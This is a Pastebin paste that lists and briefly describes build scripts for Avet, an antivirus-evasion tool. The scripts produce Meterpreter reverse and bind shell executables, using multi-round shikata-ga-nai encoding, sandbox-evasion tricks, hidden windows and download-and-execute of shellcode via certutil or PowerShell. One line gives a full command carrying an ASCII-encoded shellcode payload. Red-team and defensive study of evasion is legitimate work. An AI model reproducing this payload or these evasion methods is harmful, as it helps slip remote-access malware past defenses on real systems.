SHARE
TWEET

Build scripts of Avet

TVT618 Jan 28th, 2019 1,663 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. buildsvc_win32_meterpreter_bind_tcp_20xshikata.sh
  2. Service example for win32.
  3.  
  4. build_win32_meterpreter_rev_https_50xshikata_quiet.sh
  5. In this example the evasion technique is simple. The shellcode is encoded with 20 rounds of
  6. shikata-ga-nai, often enough that does the trick (note: Now it might be more ;) ). This
  7. technique is pretty similar to a junk loop. Execute so much code that the AV engine breaks up
  8. execution and let the file pass. Here in quiet mode, the window is hidden.
  9.  
  10. build_win32_meterpreter_rev_https_50xshikata.sh
  11. See previous, window not hidden.
  12.  
  13. build_win32_meterpreter_rev_https_ASCIIMSF_cmd.sh
  14. It is possible to load shellcode as a parameter from cmd like:
  15. C:\> pwn.exe PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIYlzHOrgpwpEPapLIheeaIPrDLKRp00NkV26lnkCbUDlK0r4OMg0JtfEaKONLWLe1aldBTlWPo1hOVmFa8GZBJRsbRwLKPRVplKqZ7LnkRlB1CHhc2hS1Jq3alKf9Q0GqICnkG97hhcfZaYnkttlKfaJvuayoNLZaJoFm31JgehKPaeYf4CamHx7KSM5t2UzDbxlKBxFDFaKcE6lK6lpKlKshELWqKcLKeTNkFaHPni1Ta4dd3k1KaqBy2zF1ioM0qOQOpZlKR2XkLMQMphPn3UT4uPsXqgQypnQy1DcXBlqgUvFgioZuDqKkRs0SBssccc3XFZ66RYI7KO9EaCpS0jtCf3v3SXoKva30309xKtuPs07pfOabF8rlcopdG3VUrK0n07BMVYSQE2T8ROGEPOPLphP8e7du0iqj3osISqBR0grC2tCfroef1aRU1OblRMqzd1UaBx737D1OW1dpv9fV7pv0SXv7k9mOkvYokeniXFF32HEPEbM0MT63v3bsaGaCsfSXJKV5DnWKKOiENv1zgzaOE8opp3S0wpMY9p1z3460SZGorvU8CEBfMNOvkOyE1CpSaC2spVqxVMtF7hCK9oXUNekpCE5DU8OxGcc0EPaxStZPVUM0kOjupO45xMyx0LePEPWp1zspQxWpR0uPS0u8c030aPc0bs3X68i42sHeioiENs2sBsOyHgrwqxEPa0eP30v3V6cXuBofNiZByo8UmUIP448ONkFg5QO3NeKpT5Iuv8O3CojHrKYo9oyop1DyEbFNfQtvGHVNDqUafVDnubDpuhUPoKxpH5i2sf2JC0sc9ohUAA
  16.  
  17. build_win32_meterpreter_rev_https_ASCIIMSF.sh
  18.  
  19. build_win32_meterpreter_rev_https_fopen_shikata_quiet.sh
  20. AV evasion with the fopen technique, hidden window.
  21.  
  22. build_win32_meterpreter_rev_https_fopen_shikata.sh
  23. See previous example.
  24.  
  25. build_win32_meterpreter_rev_https_killswitch_shikata.sh
  26. AV evasion with the killswitch technique.
  27.  
  28. build_win32_meterpreter_rev_https_shikata_download_certutil_raw_loadfile.sh
  29. Download a shellcode with the certutil.exe command and exec the shellcode.
  30.  
  31. build_win32_meterpreter_rev_https_shikata_downloadexecshellcode_DKMC.sh
  32. Like build_win32_meterpreter_rev_https_shikata_downloadexecshellcode.sh, but also builds the
  33. payload with DKMC, a tool by https://github.com/mrun1k0d3r.
  34. For more: https://govolution.wordpress.com/2018/03/02/download-exec-poc-and-dkmc/
  35.  
  36. build_win32_meterpreter_rev_https_shikata_downloadexecshellcode.sh
  37. This one downloads a shellcode from a webserver into memory and executes the shellcode.
  38.  
  39. build_win32_meterpreter_rev_https_shikata_download_powershell_raw_loadfile.sh
  40. Download a shellcode with a powershell command and exec the shellcode.
  41.  
  42. build_win32_meterpreter_rev_https_shikata_fopen.sh
  43. Sandbox evasion with fopen and additional encoding
  44.  
  45. build_win32_meterpreter_rev_https_shikata_loadfile.sh
  46. Loading and exec shellcode from given file, needs avets encoding.
  47.  
  48. build_win32_meterpreter_rev_https_shikata_load_ie.sh
  49. This is a bit tricky and might not work on the first shot. The executable will start Internet Explorer and download the ASCII encoded shellcode. Then the shellcode will be read from the cache directory and if found executed. This was tested with Windows 7 only.
  50.  
  51. build_win32_meterpreter_rev_https_shikata_load_ie_debug.sh
  52. Same as before with debug output.
  53.  
  54. build_win32_meterpreter_rev_https_shikata_raw_loadfile.sh
  55. Example for loading raw shellcode files.
  56.  
  57. build_win32_meterpreter_unstaged_rev_https_40xshikata.sh
  58. Unstaged payload with dlls included. For more see https://govolution.wordpress.com/2017/05/06/avet-and-unstaged-payloads/
  59.  
  60. build_win32_shell_rev_tcp_shikata_fopen_kaspersky.sh
  61. Build this one for Kaspersky, don't know if it is still unrecognized.
  62.  
  63. build_win64_meterpreter_rev_tcp_xor_downloadexecshellcode.sh
  64. This one downloads a shellcode from a webserver into memory and executes the shellcode.
  65.  
  66. build_win64_meterpreter_rev_tcp_xor_fopen.sh
  67. 64bit executable with fopen evasion.
  68.  
  69. build_win64_meterpreter_rev_tcp_xor.sh
  70. 64bit executable.
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top